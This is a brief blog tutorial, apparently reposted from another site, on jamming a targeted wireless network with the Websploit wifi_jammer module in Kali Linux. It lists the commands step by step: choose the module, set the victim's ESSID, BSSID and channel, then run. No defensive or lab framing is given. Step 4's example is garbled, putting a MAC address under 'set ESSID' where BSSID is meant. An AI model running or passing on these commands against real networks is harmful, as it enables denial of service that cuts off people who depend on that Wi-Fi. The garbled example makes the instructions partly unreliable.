How to jam wifi using wifi jammer in KALI LINUX

In this tutroial im going to say about how to Jam a wirless network using Websploit in Kali Linux.

Step 1 :

Open terminal & type websploit(as shown in below image).






Step 2 :


Now Type use wifi/wifi_jammer(as shown in below image).


 Step 3 :

Now Type set ESSID[victim essid name](as shown in below image).
Example:set ESSID chan
 


Step 4 :

Now Type set BSSID [victim MAC address of the wireless interface](as shown in below image).
Example:set ESSID A9-45-F2-20-13-AA



Step 5 :

Now Type set CHANNEL 7(as shown in below image).
 

Step 6 :

Now Type run (as shown in below image).
 



http://kaligr3y.blogspot.in/2013/04/how-to-jam-wirless-using-wifi-jammer-on.html
go on this link by copyright

No comments:

Powered by Blogger.